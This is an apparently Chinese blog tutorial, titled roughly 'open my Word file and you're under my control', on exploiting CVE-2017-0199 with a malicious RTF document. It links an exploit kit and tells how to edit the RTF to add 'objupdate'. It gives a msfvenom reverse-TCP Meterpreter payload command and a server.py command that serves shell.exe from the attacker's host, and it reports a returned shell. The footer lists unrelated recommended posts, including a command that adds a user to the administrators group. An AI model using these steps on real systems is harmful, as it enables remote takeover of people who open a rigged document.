你打开我的word,就会被我控制(CVE-2017-0199)

准备工作:
攻击者电脑(kali):192.168.1.130
被攻击者电脑(win7):192.168.115
下载漏洞利用工具:https://github.com/haibara3839/CVE-2017-0199-master
把innocent.doc和server.py两个文件放到攻击者电脑上,并开启Apache服务
漏洞利用:
1、新建个word,向下面这样配置


2、保存成RTF格式


3、使用记事本打开test.rtf文件,在文件中查找objautlink,然后在objautlink后面插入objupdate


4、然后配置反弹shell

msfvenom -p windows/meterpreter/reverse_tcp LHOST=192.168.1.130 LPORT=6666 -f exe > shell.exe
5、运行server.py服务

先把Apache服务关闭
python server.py 80 http://192.168.1.130/shell.exe /var/www/html/shell.exe
被攻击端打开word,点击是


成功返回shell

最后编辑于
©著作权归作者所有,转载或内容合作请联系作者
平台声明:文章内容(如有图片或视频亦包括在内)由作者上传并发布,文章内容仅代表作者本人观点,简书系信息发布平台,仅提供信息存储服务。

推荐阅读更多精彩内容

  • sqlmap用户手册 说明:本文为转载,对原文中一些明显的拼写错误进行修正,并标注对自己有用的信息。 ======...
    wind_飘阅读 2,098评论 0 5
  • http://192.168.136.131/sqlmap/mysql/get_int.php?id=1 当给sq...
    xuningbo阅读 10,427评论 2 22
  • 转自:http://www.freebuf.com/sectool/105524.html 本文为作者总结自己在渗...
    许安念安阅读 5,674评论 0 10
  • win7 cmd管理员权限设置 net localgroup administrators 用户名 /add 把“...
    f675b1a02698阅读 5,351评论 0 11
  • 亲爱的婆婆,当我写下这些文字的时候,我的眼泪禁不住又流下来,一想到您,我就无法抑制自己的泪水,自从您离开了我们,我...
    云姝曼珠阅读 1,175评论 26 22